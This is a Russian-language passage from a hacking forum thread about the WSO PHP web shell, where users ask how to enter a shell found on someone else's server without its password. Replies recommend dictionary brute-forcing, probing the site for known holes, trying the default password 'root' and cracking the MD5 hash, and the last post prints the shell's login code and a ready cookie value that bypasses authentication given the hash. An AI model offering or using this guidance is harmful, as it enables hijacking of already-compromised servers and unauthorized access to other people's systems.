HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #541  
Старый 20.12.2016, 12:03
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от GTAlex  
GTAlex said:

собственно, вопрос как раз был о том, чтобы не парсить
думал, может есть более удобный инструмент для удалённого запуска PHP скриптов
Впринцепи я вам четко ответил по вашему вопросу, а дальше думайте сами как хотите....
 
Ответить с цитированием

  #542  
Старый 20.12.2016, 12:05
GTAlex
Новичок
Регистрация: 07.09.2009
Сообщений: 1
Провел на форуме:
5451

Репутация: 0
По умолчанию

Да, спасибо - регулярка элементарная.

Именно этот вариант сейчас в работе.

Цитата:
Сообщение от None  
....
 
Ответить с цитированием

  #543  
Старый 03.01.2017, 03:38
demok
Guest
Сообщений: n/a
Провел на форуме:
1766

Репутация: 0
По умолчанию

подскажите пожалуйста

есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
 
Ответить с цитированием

  #544  
Старый 04.01.2017, 05:57
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Цитата:
Сообщение от demok  
demok said:

подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Узнать пас не получится, попробуй побрутить доступ к шелу по стандартным словарям, либо проверь сайт на известные уязвимости. Если шел до сих пор там, значит и уязвимости актуальны.
 
Ответить с цитированием

  #545  
Старый 28.01.2017, 19:33
artur1111
Guest
Сообщений: n/a
Провел на форуме:
3455

Репутация: 0
По умолчанию

Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
 
Ответить с цитированием

  #546  
Старый 29.01.2017, 01:28
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от artur1111  
artur1111 said:

Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
 
Ответить с цитированием

  #547  
Старый 30.01.2017, 20:48
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от artur1111  
artur1111 said:

Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
 
Ответить с цитированием

  #548  
Старый 31.01.2017, 21:35
artur1111
Guest
Сообщений: n/a
Провел на форуме:
3455

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
 
Ответить с цитированием

  #549  
Старый 25.05.2017, 19:13
Dr_Wile
Guest
Сообщений: n/a
Провел на форуме:
45893

Репутация: 2
По умолчанию

Цитата:
Сообщение от demok  
demok said:

подскажите пожалуйста
есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
 
Ответить с цитированием

  #550  
Старый 26.05.2017, 11:17
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Dr_Wile  
Dr_Wile said:

Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!

Давайте посмотрим в сторону кода самого шела как происходит авторизация:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"63a9f0ea7bb98050796b649e85481845"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//пусть условно будет пароль root

//..........

[/COLOR][COLOR="#007700"]if(!empty([/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#FF8000"]//если присутствует пароль
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#FF8000"]// и пароль равен его хэшь сумме
[/COLOR][COLOR="#0000BB"]WSOsetcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]),[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// отправляем куку с параметром хэшь хоста и значением хэшь пароля

[/COLOR][COLOR="#007700"]if (!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])]) || ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]])] !=[/COLOR][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]))
[/
COLOR][COLOR="#0000BB"]wsoLogin[/COLOR][COLOR="#007700"]();
}[/
COLOR][/COLOR
предположим что у нас HOST: localhost

тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:

421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb980507 96b649e85481845
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ